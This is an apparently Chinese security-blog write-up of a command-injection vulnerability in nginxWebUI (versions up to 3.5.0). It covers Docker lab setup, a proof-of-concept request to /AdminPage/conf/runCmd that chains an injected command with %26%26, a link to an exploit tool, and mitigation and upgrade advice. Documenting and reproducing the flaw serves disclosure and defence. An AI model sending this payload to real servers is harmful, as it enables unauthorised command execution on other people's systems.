0x01 简介
nginxWebUI是一款图形化管理nginx配置的工具, 可以使用网页来快速配置nginx的各项功能, 包括http协议转发,tcp协议转发, 反向代理, 负载均衡, 静态html服务器, ssl证书自动申请、续签、配置等, 配置好后可一建生成nginx.conf文件, 同时可控制nginx使用此文件进行启动与重载, 完成对nginx的图形化控制闭环.
0x02 漏洞概述
nginxWebUI由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。
该漏洞利用条件简单,漏洞危害较高。
0x03 影响版本
nginxWebUI <= 3.5.0
0x04 环境搭建
docker搭建 可参考https://www.nginxwebui.cn/product.html
docker pull cym1102/nginxwebui:3.4.8
docker images
docker run -d -p 8080:8080 172b6946cdb0
启动后,用netstat -anltp 查看8080端口是否打开,打开后即可访问
0x05 漏洞复现
利用POC进行检测
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
此时证明漏洞存在,测试下能否执行命令回显: PS:特殊字符需URL编码
利用EXP脚本实现命令行攻击
漏洞利用工具下载地址
https://github.com/crow821/crowsec
0x06 修复方式
临时缓解方案
该漏洞属于命令拼接漏洞,所以可使用WAF进行防护。但是低版本同时存在权限绕过问题,该问题使用防护设备无法缓解。建议如非必要,不要将该系统暴露在互联网上。
升级修复方案
官方已发布了新版本修复了权限绕过漏洞,并且在一定程度上缓解了远程命令执行的风险。建议用户前往官网更新至最新版本
nginxWebUI - 首页
另外由于官方过滤用户输入的方式并不严格,导致后台可能依旧存在命令执行的风险,可通过使用强口令降低风险。
参考链接
https://mp.weixin.qq.com/s/5N89pINE9SmpMFUoVJlgbA
https://mp.weixin.qq.com/s/ho-xdGahg9kcUl1dYmDZGQ
推荐服务
历史漏洞
暂无
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
回复【5】进入SRC-QQ交流群
商务合作
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...